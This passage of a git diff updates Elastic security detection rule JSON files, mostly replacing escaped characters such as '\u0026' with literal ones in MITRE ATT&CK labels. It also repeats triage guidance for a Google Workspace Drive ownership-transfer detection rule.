ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_6.json b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_6.json index 6075eb39d0d..d857fbbd311 100644 --- a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_6.json +++ b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_6.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_104.json index 80a0f837191..56abe2e6941 100644 --- a/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_104.json +++ b/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_105.json index ccc884dc385..9bf7c5b5d4e 100644 --- a/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_105.json +++ b/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_105.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Drive Ownership Transferred via Google Workspace", - "note": "## Triage and analysis\n\n### Investigating Google Drive Ownership Transferred via Google Workspace\n\nGoogle Drive is a cloud storage service that allows users to store and access files. It is available to users with a Google Workspace account.\n\nGoogle Workspace administrators consider users' roles and organizational units when assigning permissions to files or shared drives. Owners of sensitive files and folders can grant permissions to users who make internal or external access requests. Adversaries abuse this trust system by accessing Google Drive resources with improperly scoped permissions and shared settings. Distributing phishing emails is another common approach to sharing malicious Google Drive documents. With this approach, adversaries aim to inherit the recipient's Google Workspace privileges when an external entity grants ownership.\n\nThis rule identifies when the ownership of a shared drive within a Google Workspace organization is transferred to another internal user.\n\n#### Possible investigation steps\n\n- From the admin console, review admin logs for involved user accounts. To find admin logs, go to `Security \u003e Reporting \u003e Audit and investigation \u003e Admin log events`.\n- Determine if involved user accounts are active. To view user activity, go to `Directory \u003e Users`.\n- Check if the involved user accounts were recently disabled, then re-enabled.\n- Review involved user accounts for potentially misconfigured permissions or roles.\n- Review the involved shared drive or files and related policies to determine if this action was expected and appropriate.\n- If a shared drive, access requirements based on Organizational Units in `Apps \u003e Google Workspace \u003e Drive and Docs \u003e Manage shared drives`.\n- Triage potentially related alerts based on the users involved. To find alerts, go to `Security \u003e Alerts`.\n\n### False positive analysis\n\n- Transferring drives requires Google Workspace administration permissions related to Google Drive. Check if this action was planned/expected from the requester and is appropriately targeting the correct receiver.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Google Drive Ownership Transferred via Google Workspace\n\nGoogle Drive is a cloud storage service that allows users to store and access files. It is available to users with a Google Workspace account.\n\nGoogle Workspace administrators consider users' roles and organizational units when assigning permissions to files or shared drives. Owners of sensitive files and folders can grant permissions to users who make internal or external access requests. Adversaries abuse this trust system by accessing Google Drive resources with improperly scoped permissions and shared settings. Distributing phishing emails is another common approach to sharing malicious Google Drive documents. With this approach, adversaries aim to inherit the recipient's Google Workspace privileges when an external entity grants ownership.\n\nThis rule identifies when the ownership of a shared drive within a Google Workspace organization is transferred to another internal user.\n\n#### Possible investigation steps\n\n- From the admin console, review admin logs for involved user accounts. To find admin logs, go to `Security > Reporting > Audit and investigation > Admin log events`.\n- Determine if involved user accounts are active. To view user activity, go to `Directory > Users`.\n- Check if the involved user accounts were recently disabled, then re-enabled.\n- Review involved user accounts for potentially misconfigured permissions or roles.\n- Review the involved shared drive or files and related policies to determine if this action was expected and appropriate.\n- If a shared drive, access requirements based on Organizational Units in `Apps > Google Workspace > Drive and Docs > Manage shared drives`.\n- Triage potentially related alerts based on the users involved. To find alerts, go to `Security > Alerts`.\n\n### False positive analysis\n\n- Transferring drives requires Google Workspace administration permissions related to Google Drive. Check if this action was planned/expected from the requester and is appropriately targeting the correct receiver.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.action:\"CREATE_DATA_TRANSFER_REQUEST\"\n and event.category:\"iam\" and google_workspace.admin.application.name:Drive*\n", "references": [ "https://support.google.com/a/answer/1247799?hl=en" @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_106.json index 434d01055d2..e78ca808daa 100644 --- a/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_106.json +++ b/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_106.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Drive Ownership Transferred via Google Workspace", - "note": "## Triage and analysis\n\n### Investigating Google Drive Ownership Transferred via Google Workspace\n\nGoogle Drive is a cloud storage service that allows users to store and access files. It is available to users with a Google Workspace account.\n\nGoogle Workspace administrators consider users' roles and organizational units when assigning permissions to files or shared drives. Owners of sensitive files and folders can grant permissions to users who make internal or external access requests. Adversaries abuse this trust system by accessing Google Drive resources with improperly scoped permissions and shared settings. Distributing phishing emails is another common approach to sharing malicious Google Drive documents. With this approach, adversaries aim to inherit the recipient's Google Workspace privileges when an external entity grants ownership.\n\nThis rule identifies when the ownership of a shared drive within a Google Workspace organization is transferred to another internal user.\n\n#### Possible investigation steps\n\n- From the admin console, review admin logs for involved user accounts. To find admin logs, go to `Security \u003e Reporting \u003e Audit and investigation \u003e Admin log events`.\n- Determine if involved user accounts are active. To view user activity, go to `Directory \u003e Users`.\n- Check if the involved user accounts were recently disabled, then re-enabled.\n- Review involved user accounts for potentially misconfigured permissions or roles.\n- Review the involved shared drive or files and related policies to determine if this action was expected and appropriate.\n- If a shared drive, access requirements based on Organizational Units in `Apps \u003e Google Workspace \u003e Drive and Docs \u003e Manage shared drives`.\n- Triage potentially related alerts based on the users involved. To find alerts, go to `Security \u003e Alerts`.\n\n### False positive analysis\n\n- Transferring drives requires Google Workspace administration permissions related to Google Drive. Check if this action was planned/expected from the requester and is appropriately targeting the correct receiver.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Google Drive Ownership Transferred via Google Workspace\n\nGoogle Drive is a cloud storage service that allows users to store and access files. It is available to users with a Google Workspace account.\n\nGoogle Workspace administrators consider users' roles and organizational units when assigning permissions to files or shared drives. Owners of sensitive files and folders can grant permissions to users who make internal or external access requests. Adversaries abuse this trust system by accessing Google Drive resources with improperly scoped permissions and shared settings. Distributing phishing emails is another common approach to sharing malicious Google Drive documents. With this approach, adversaries aim to inherit the recipient's Google Workspace privileges when an external entity grants ownership.\n\nThis rule identifies when the ownership of a shared drive within a Google Workspace organization is transferred to another internal user.\n\n#### Possible investigation steps\n\n- From the admin console, review admin logs for involved user accounts. To find admin logs, go to `Security > Reporting > Audit and investigation > Admin log events`.\n- Determine if involved user accounts are active. To view user activity, go to `Directory > Users`.\n- Check if the involved user accounts were recently disabled, then re-enabled.\n- Review involved user accounts for potentially misconfigured permissions or roles.\n- Review the involved shared drive or files and related policies to determine if this action was expected and appropriate.\n- If a shared drive, access requirements based on Organizational Units in `Apps > Google Workspace > Drive and Docs > Manage shared drives`.\n- Triage potentially related alerts based on the users involved. To find alerts, go to `Security > Alerts`.\n\n### False positive analysis\n\n- Transferring drives requires Google Workspace administration permissions related to Google Drive. Check if this action was planned/expected from the requester and is appropriately targeting the correct receiver.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.action:\"CREATE_DATA_TRANSFER_REQUEST\"\n and event.category:\"iam\" and google_workspace.admin.application.name:Drive*\n", "references": [ "https://support.google.com/a/answer/1247799?hl=en" @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_102.json b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_102.json index c58ce02c4f2..8ecbe52ddd1 100644 --- a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_103.json b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_103.json index eff45c41b7e..4c57302e844 100644 --- a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_104.json b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_104.json index 7b438d8272a..321c59c7b34 100644 --- a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_104.json +++ b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_104.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_105.json b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_105.json index fb965a4e8d0..76785ab8437 100644 --- a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_105.json +++ b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_105.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_102.json b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_102.json index f6b6d164f26..023e66cc76c 100644 --- a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_102.json +++ b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_102.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_103.json b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_103.json index 93315c75005..bf373161a47 100644 --- a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_103.json +++ b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_103.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_104.json b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_104.json index af5a303753f..6e639b89fdc 100644 --- a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_104.json +++ b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_104.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_105.json b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_105.json index 50bde4f7f19..3a39cbd7094 100644 --- a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_105.json +++ b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_105.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_102.json b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_102.json index 28e20721ce8..15f78976def 100644 --- a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_102.json +++ b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_102.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_103.json b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_103.json index 18ab2b04bb2..89f949c683b 100644 --- a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_103.json +++ b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_104.json b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_104.json index ddba9849d6b..31e05057692 100644 --- a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_104.json +++ b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_105.json b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_105.json index 81482ba4ca4..32aced67dc8 100644 --- a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_105.json +++ b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_105.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_1.json b/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_1.json index c18bc65ad84..6b4780b92ff 100644 --- a/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_1.json +++ b/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_1.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_2.json b/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_2.json index bb2188037ff..fdd5f384efb 100644 --- a/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_2.json +++ b/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_2.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_1.json b/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_1.json index 185d8f3e8fc..cd368df3fdd 100644 --- a/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_1.json +++ b/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_1.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_2.json b/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_2.json index e9286828e7b..010ebf0645e 100644 --- a/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_2.json +++ b/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_2.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_3.json b/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_3.json index 8dad377b6f4..dee56302d16 100644 --- a/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_3.json +++ b/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_3.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_102.json b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_102.json index d97980692cb..e387f33b92a 100644 --- a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_102.json @@ -42,7 +42,7 @@ ], "risk_score": 47, "rule_id": "092b068f-84ac-485d-8a55-7dd9e006715f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_103.json b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_103.json index 654738d361a..57737882efd 100644 --- a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_103.json @@ -42,7 +42,7 @@ ], "risk_score": 47, "rule_id": "092b068f-84ac-485d-8a55-7dd9e006715f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to 